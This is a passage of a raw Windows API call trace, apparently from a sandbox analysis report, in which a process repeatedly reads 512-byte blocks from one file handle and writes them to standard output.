(_FileHandle=1) returned 0x50 [0131.075] GetFileType (hFile=0x50) returned 0x1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] GetFileType (hFile=0x50) returned 0x1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] GetFileType (hFile=0x50) returned 0x1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.075] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0131.075] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.075] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.075] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] GetFileType (hFile=0x50) returned 0x1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] GetFileType (hFile=0x50) returned 0x1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] GetFileType (hFile=0x50) returned 0x1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] GetFileType (hFile=0x50) returned 0x1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] GetFileType (hFile=0x50) returned 0x1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] GetFileType (hFile=0x50) returned 0x1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] GetFileType (hFile=0x50) returned 0x1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] GetFileType (hFile=0x50) returned 0x1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.076] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.076] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.076] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.076] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.076] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.077] GetFileType (hFile=0x50) returned 0x1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.077] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, 
lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.079] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.079] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.079] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.079] ReadFile 
(in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.079] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.079] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.079] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.079] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.079] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.080] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.080] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.080] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 
[0131.080] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.080] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.080] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.080] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.080] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.081] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.081] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.081] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.081] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, 
lpOverlapped=0x0) returned 1 [0131.081] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.081] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.081] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.081] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.081] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, 
lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.082] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: 
lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.083] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, 
lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, 
